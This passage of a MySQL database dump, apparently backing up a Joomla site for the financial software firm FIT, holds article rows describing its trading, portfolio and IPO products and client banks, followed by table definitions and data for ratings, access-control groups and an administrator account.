00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,7,'','',0,0,'robots=\nauthor='),(332,'qnb','qnb','','<ol start=\"1\">\r\n<li>Qatar National Bank (QNB)</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:48:01',62,'','2012-03-21 13:42:55',62,0,'0000-00-00 00:00:00','2012-03-21 12:48:01','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,6,'','',0,0,'robots=\nauthor='),(333,'cbq','cbq','','<ol start=\"1\">\r\n<li>Commercial Bank of Qatar (CBQ)</li>\r\n</ol><br />','',1,10,0,70,'2012-03-21 12:48:17',62,'','2012-03-21 13:42:47',62,0,'0000-00-00 00:00:00','2012-03-21 12:48:17','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,5,'','',0,0,'robots=\nauthor='),(334,'kse','kse','','<ol>\r\n<li>Khartoum Stock Exchange</li>\r\n</ol>','',1,10,0,70,'2012-03-21 12:48:53',62,'','2012-09-11 11:54:09',62,0,'0000-00-00 00:00:00','2012-03-21 12:48:53','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',3,0,4,'','',0,0,'robots=\nauthor='),(336,'Front Office Operations On-Line Trading System– (Borsat)','front-office-operations-on-line-trading-system-borsat','','<p>Borsat is a powerful trading solution that allows you to work with various brokers and data vendors from a single multifunctional front-end application </p>\r\n<p>Borsat offers legendary fast real time straight through processing capabilities that allow trading across multiple markets. Trading services includes a complete order management system (OMS), and FIX connectivity to exchanges, and trade validations. Borsat connects to the back office solutions to offer accounting, wealth management, risk management, portfolio management and other related services.</p>','',1,11,0,65,'2012-03-21 14:25:26',62,'','2012-03-21 14:28:38',62,0,'0000-00-00 00:00:00','2012-03-21 14:25:26','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,2,'','',0,8,'robots=\nauthor='),(337,'Mobile Trading platform (BORSAT mobile)','mobile-trading-platform-borsat-mobile','','<p>BORSAT mobile - is a solution that provides brokerage information and services online for your iPhone & BlackBerry using the latest Internet technologies.</p>','',1,11,0,65,'2012-03-21 14:27:10',62,'','2012-03-21 14:28:47',62,0,'0000-00-00 00:00:00','2012-03-21 14:27:10','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,3,'','',0,5,'robots=\nauthor='),(338,'Asset Management Solution','asset-management-solution','','<p>Asset Management Solution Comprehensive Functionality Addressing Key Mission-Critical Business Needs</p>\r\n<ul>\r\n<li>Multi-Currency</li>\r\n<li>Multi- Exchange,</li>\r\n<li>Multi-Fund </li>\r\n<li>Complete Share holder information, Subscription & Redemption module</li>\r\n<li>Track stocks, funds, Bonds, etc </li>\r\n<li>Retrieve transactions from broker/fund </li>\r\n<li>Track stop loss alerts </li>\r\n<li>Fund Accounting & Financial Reporting </li>\r\n<li>Investment Tracking & Portfolio Management </li>\r\n<li>Custodian Module </li>\r\n<li>Management & Investor Reporting </li>\r\n<li>Performance Fee-Hurdle Rate, Management Fee, Custody Fee </li>\r\n<li>NET Asset Module (NAV Calculation), Daily Calculation </li>\r\n<li>Internet-Based Administration, Query and Reporting Solutions </li>\r\n<li>Investor Subscription & Redemptions </li>\r\n<li>Corporate Action </li>\r\n<li>Broker Settlements </li>\r\n</ul>','',1,11,0,65,'2012-03-21 14:27:44',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 14:27:44','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,4,'','',0,3,'robots=\nauthor='),(339,'Portfolio Management Software (portfolio VISION)','portfolio-management-software-portfolio-vision','','<p>Portfolio management software will account for your clients investment portfolios and give him a statement of all of his investment holdings or just the investment portfolio(s) you are managing. These systems incorporate varying features and as a result, each program may appeal to differing investment practices. Typical portfolio systems can be updated daily via Broker/Dealer and Mutual Fund downloads, pricing services via internet or manually entered.</p>','',1,11,0,65,'2012-03-21 14:28:56',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 14:28:56','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,5,'','',0,3,'robots=\nauthor='),(340,'Fund Management System (fund VISION)','fund-management-system-fund-vision','','<p>It helps investors track and analyze their stocks, mutual funds, and other investments with a wide variety of easy to use graphs and reports. Fund Manager makes keeping track of your investments easy by updating prices and retrieving your transactions from the Internet with the push of a button.</p>','',1,11,0,65,'2012-03-21 14:29:52',62,'','2012-03-21 14:31:20',62,0,'0000-00-00 00:00:00','2012-03-21 14:29:52','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',2,0,6,'','',0,4,'robots=\nauthor='),(341,'Research Management System (RESARCHER)','research-management-system-resarcher-','','<p><strong>RESARCHER </strong>is an investment record keeping; companies records updated with the research information according to balance sheet and profit and loss, this module will generate most of the ratios required by brokers, portfolio managers and investors.</p>','',1,11,0,65,'2012-03-21 14:31:31',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 14:31:31','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,7,'','',0,2,'robots=\nauthor='),(342,'FIT Index Management Solution (FIMS)','fit-index-management-solution-fims','','<b>FIT Index Management Solution (FIMS)</b> - is a solution that provides, Index Service for financial institutions with an independent solution to administer, manage, calculate, and publish their proprietary indices.','',1,11,0,65,'2012-03-21 14:32:33',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 14:32:33','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,8,'','',0,3,'robots=\nauthor='),(343,'Initial Public Offering Solution (IPO Manager)','initial-public-offering-solution-ipo-manager-','','<p><i>IPO Manager</i> will be dedicated to the support of the activity of IPO activities,</p>','',1,11,0,65,'2012-03-21 15:03:26',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:03:26','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,9,'','',0,1,'robots=\nauthor='),(344,'Financial Portals Solutions','financial-portals-solutions','','<p>We offer an a wide array of solutions which are designed to meet the goals and vision of Investments & financial companies</p>\r\n<ul>\r\n<li>Dubai Financial Market <a title=\"blocked::http://www.dfm.ae/\" target=\"_blank\" href=\"http://www.dfm.ae/\">www2.dfm.ae</a></li>\r\n</ul>\r\n<ul>\r\n<li>Muscat Securities Market <a title=\"blocked::http://www.msm.gov.om/\" target=\"_blank\" href=\"http://www.msm.gov.om/\">www.msm.gov.om</a></li>\r\n</ul>\r\n<ul>\r\n<li>Oman Arab Bank <a title=\"blocked::http://www.oabinvest.com/\" target=\"_blank\" href=\"http://www.oabinvest.com/\">www.oabinvest.com</a></li>\r\n</ul>\r\n<ul>\r\n<li>United Securities <a title=\"blocked::http://www.usoman.com/\" target=\"_blank\" href=\"http://www.usoman.com/\">www.usoman.com</a> </li>\r\n</ul>','',1,11,0,65,'2012-03-21 15:04:03',62,'','2012-03-21 15:06:00',62,0,'0000-00-00 00:00:00','2012-03-21 15:04:03','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',4,0,10,'','',0,6,'robots=\nauthor='),(345,'Multi-Markets','multi-markets-','','<p>Supports Multi-Markets in one screen</p>','',1,11,0,65,'2012-03-21 15:06:16',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:06:16','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,11,'','',0,3,'robots=\nauthor='),(346,'Banking Gateways (On-line and Off-line)','banking-gateways-on-line-and-off-line','','<ul>\r\n<li>Clients can deposit money into the brokerage banking account in the bank it reflects online into their brokerage system records and vice versa.</li>\r\n<li> Clients can issue a transfer on-line from their brokerage accounts to their banking accounts.</li>\r\n</ul>','',1,11,0,65,'2012-03-21 15:07:47',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:07:47','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,12,'','',0,3,'robots=\nauthor='),(347,'FIX 4.2 Sell Interface','fix-42-sell-interface','','<p>This interface will allow the investment company to have the ability to receive orders from other brokerage companies, financial institutions and other parties who have systems compatible with FIX 4.2.</p>','',1,11,0,65,'2012-03-21 15:09:59',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:09:59','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,13,'','',0,1,'robots=\nauthor='),(348,'Islamic Trading Module','islamic-trading-module','','<p>The investment company can control the trading on Islamic/non Islamic companies according to Sharia compliance.</p>','',1,11,0,65,'2012-03-21 15:10:29',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:10:29','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,14,'','',0,3,'robots=\nauthor='),(349,'Our success results from a combination of corporate values:','our-success-results-from-a-combination-of-corporate-values','','<ul>\r\n<li>We are specialized in providing software solutions only for the business segments we know very well.</li>\r\n<li>We offer to our clients more than just a software system. Through the unrivalled business expertise and know-how of FIT staff, resulting from more than 15 years of industry experience.</li>\r\n<li>We are bringing our clients the competitive advantages of decreasing both the time to market for value-added services and the cost of ownership, while improving the quality of the services provided to their demanding clients.</li>\r\n<li>We are committed to a long-term partnership with our clients, based on a collaborative and constructive approach. We look for a truly win-win scenario.</li>\r\n<li>We enjoy a very low staff turnover.</li>\r\n</ul>','',1,10,0,60,'2012-03-21 15:18:16',62,'','0000-00-00 00:00:00',0,62,'2012-03-21 15:18:45','2012-03-21 15:18:16','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,3,'','',0,0,'robots=\nauthor='),(350,'FIT Products Portfolio includes:','fit-products-portfolio-includes','','<p>Besides ready-made applications already working in the <st1:place>Middle East</st1:place> area, FIT is provide its customers with expertise in the following sectors:</p>\r\n','\r\n<ul>\r\n<li>Consultancy – Supporting its customers in the design phase, keeping in consideration every aspect of the system: technical, functional, and architectural;</li>\r\n<li>Design and Development – Through its specialized workgroups, the company can develop any type of complete solution, built on the assets of knowledge and experiences;</li>\r\n<li>Systems Support and Maintenance – Delivered to the customers for any type of requirement relevant to software, application management and data-stream.</li>\r\n<li></li>\r\n</ul>\r\n<p> </p>\r\n<p>Through (solutions, consultancy, design and development, support and maintenance) FIT provides four products to customers in the Gulf Region: </p>\r\n<ul>\r\n<li>Real Time Brokerage System;</li>\r\n<li>Wealth Management Software;</li>\r\n<li>Portfolio Management Software; </li>\r\n<li>IPO Manager.</li>\r\n</ul>\r\n<p><img style=\"display: block; margin-left: auto; margin-right: auto;\" src=\"images/stories/FIT-Products-Portfolio.jpg\" width=\"529\" height=\"316\" alt=\"FIT-Products-Portfolio\" /></p>',1,10,0,60,'2012-03-21 15:24:43',62,'','2012-03-21 15:33:35',62,0,'0000-00-00 00:00:00','2012-03-21 15:24:43','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',9,0,2,'','',0,14,'robots=\nauthor='),(352,'Central Registration Depository','central-registration-depository','',' ','',1,11,0,66,'2012-03-21 15:48:33',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:48:33','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,2,'','',0,5,'robots=\nauthor='),(353,'Clearing & Settlement','clearing-a-settlement','',' ','',1,11,0,66,'2012-03-21 15:49:35',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:49:35','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,3,'','',0,1,'robots=\nauthor='),(354,'Surveillance & Market Control','surveillance-a-market-control','',' ','',1,11,0,66,'2012-03-21 15:49:47',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:49:47','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,4,'','',0,1,'robots=\nauthor='),(355,'Market Information Repository','market-information-repository-','',' ','',1,11,0,66,'2012-03-21 15:49:58',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:49:58','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,5,'','',0,1,'robots=\nauthor='),(356,'Internet Trading','internet-trading','',' ','',1,11,0,66,'2012-03-21 15:50:09',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:50:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,6,'','',0,2,'robots=\nauthor='),(357,'Market Information Dissemination','market-information-dissemination','',' ','',1,11,0,66,'2012-03-21 15:50:22',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-03-21 15:50:22','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,7,'','',0,3,'robots=\nauthor='),(358,'Careers at FIT','careers-at-fit','','<p>Thank you for your interest in <strong>FIT</strong>. <a href=\"index.php?option=com_content&view=article&id=358&Itemid=158\">Please complete and submit this form with your resume</a>. We will contact you if we have an appropriate match.</p>','',1,10,0,60,'2012-03-21 17:17:48',62,'','2012-03-21 17:26:18',62,0,'0000-00-00 00:00:00','2012-03-21 17:17:48','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',7,0,1,'','',0,24,'robots=\nauthor='),(360,'nboad','nboad','','<ol>\r\n<li>NATIONAL BANK OF ABUDHABI</li>\r\n</ol>','',1,10,0,70,'2012-09-11 11:49:09',62,'','2012-09-11 11:53:15',62,0,'0000-00-00 00:00:00','2012-09-11 11:49:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',7,0,2,'','',0,0,'robots=\nauthor='),(361,'sico','sico','','<ol>\r\n<li>SICO - UAE</li>\r\n</ol>','',1,10,0,70,'2012-09-11 11:49:09',62,'','2012-09-11 11:59:00',62,0,'0000-00-00 00:00:00','2012-09-11 11:49:09','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=\narticle_suffix=',1,0,1,'','',0,0,'robots=\nauthor='); /*!40000 ALTER TABLE `bak_fit_bss_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_content_frontpage` -- DROP TABLE IF EXISTS `bak_fit_bss_content_frontpage`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_content_frontpage` ( `content_id` int(11) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`content_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_content_frontpage` -- LOCK TABLES `bak_fit_bss_content_frontpage` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_content_frontpage` DISABLE KEYS */; INSERT INTO `bak_fit_bss_content_frontpage` VALUES (1,2),(5,3),(284,1); /*!40000 ALTER TABLE `bak_fit_bss_content_frontpage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_content_rating` -- DROP TABLE IF EXISTS `bak_fit_bss_content_rating`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_content_rating` ( `content_id` int(11) NOT NULL default '0', `rating_sum` int(11) unsigned NOT NULL default '0', `rating_count` int(11) unsigned NOT NULL default '0', `lastip` varchar(50) NOT NULL default '', PRIMARY KEY (`content_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_content_rating` -- LOCK TABLES `bak_fit_bss_content_rating` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_content_rating` DISABLE KEYS */; INSERT INTO `bak_fit_bss_content_rating` VALUES (270,4,1,'79.134.129.93'); /*!40000 ALTER TABLE `bak_fit_bss_content_rating` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_acl_aro` -- DROP TABLE IF EXISTS `bak_fit_bss_core_acl_aro`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_acl_aro` ( `id` int(11) NOT NULL auto_increment, `section_value` varchar(240) NOT NULL default '0', `value` varchar(240) NOT NULL default '', `order_value` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `hidden` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=46 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_acl_aro` -- LOCK TABLES `bak_fit_bss_core_acl_aro` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro` DISABLE KEYS */; INSERT INTO `bak_fit_bss_core_acl_aro` VALUES (10,'users','62',0,'Adminbss',0); /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_acl_aro_groups` -- DROP TABLE IF EXISTS `bak_fit_bss_core_acl_aro_groups`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_acl_aro_groups` ( `id` int(11) NOT NULL auto_increment, `parent_id` int(11) NOT NULL default '0', `name` varchar(255) NOT NULL default '', `lft` int(11) NOT NULL default '0', `rgt` int(11) NOT NULL default '0', `value` varchar(255) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_acl_aro_groups` -- LOCK TABLES `bak_fit_bss_core_acl_aro_groups` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_groups` DISABLE KEYS */; INSERT INTO `bak_fit_bss_core_acl_aro_groups` VALUES (17,0,'ROOT',1,22,'ROOT'),(28,17,'USERS',2,21,'USERS'),(29,28,'Public Frontend',3,12,'Public Frontend'),(18,29,'Registered',4,11,'Registered'),(19,18,'Author',5,10,'Author'),(20,19,'Editor',6,9,'Editor'),(21,20,'Publisher',7,8,'Publisher'),(30,28,'Public Backend',13,20,'Public Backend'),(23,30,'Manager',14,19,'Manager'),(24,23,'Adminbss',15,18,'Adminbss'),(25,24,'Super Adminbss',16,17,'Super Adminbss'); /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_acl_aro_map` -- DROP TABLE IF EXISTS `bak_fit_bss_core_acl_aro_map`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_acl_aro_map` ( `acl_id` int(11) NOT NULL default '0', `section_value` varchar(230) NOT NULL default '0', `value` varchar(100) NOT NULL default '', PRIMARY KEY (`acl_id`,`section_value`,`value`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_acl_aro_map` -- LOCK TABLES `bak_fit_bss_core_acl_aro_map` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_map` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_acl_aro_sections` -- DROP TABLE IF EXISTS `bak_fit_bss_core_acl_aro_sections`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_acl_aro_sections` ( `id` int(11) NOT NULL auto_increment, `value` varchar(230) NOT NULL default '', `order_value` int(11) NOT NULL default '0', `name` varchar(230) NOT NULL default '', `hidden` int(11) NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_acl_aro_sections` -- LOCK TABLES `bak_fit_bss_core_acl_aro_sections` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_sections` DISABLE KEYS */; INSERT INTO `bak_fit_bss_core_acl_aro_sections` VALUES (10,'users',1,'Users',0); /*!40000 ALTER TABLE `bak_fit_bss_core_acl_aro_sections` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_acl_groups_aro_map` -- DROP TABLE IF EXISTS `bak_fit_bss_core_acl_groups_aro_map`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_acl_groups_aro_map` ( `group_id` int(11) NOT NULL default '0', `section_value` varchar(240) NOT NULL default '', `aro_id` int(11) NOT NULL default '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_acl_groups_aro_map` -- LOCK TABLES `bak_fit_bss_core_acl_groups_aro_map` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_acl_groups_aro_map` DISABLE KEYS */; INSERT INTO `bak_fit_bss_core_acl_groups_aro_map` VALUES (25,'',10); /*!40000 ALTER TABLE `bak_fit_bss_core_acl_groups_aro_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_log_items` -- DROP TABLE IF EXISTS `bak_fit_bss_core_log_items`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_log_items` ( `time_stamp` date NOT NULL default '0000-00-00', `item_table` varchar(50) NOT NULL default '', `item_id` int(11) unsigned NOT NULL default '0', `hits` int(11) unsigned NOT NULL default '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_log_items` -- LOCK TABLES `bak_fit_bss_core_log_items` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_log_items` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_core_log_items` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_core_log_searches` -- DROP TABLE IF EXISTS `bak_fit_bss_core_log_searches`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_core_log_searches` ( `search_term` varchar(128) NOT NULL default '', `hits` int(11) unsigned NOT NULL default '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_core_log_searches` -- LOCK TABLES `bak_fit_bss_core_log_searches` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_core_log_searches` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_core_log_searches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_dbcache` -- DROP TABLE IF EXISTS 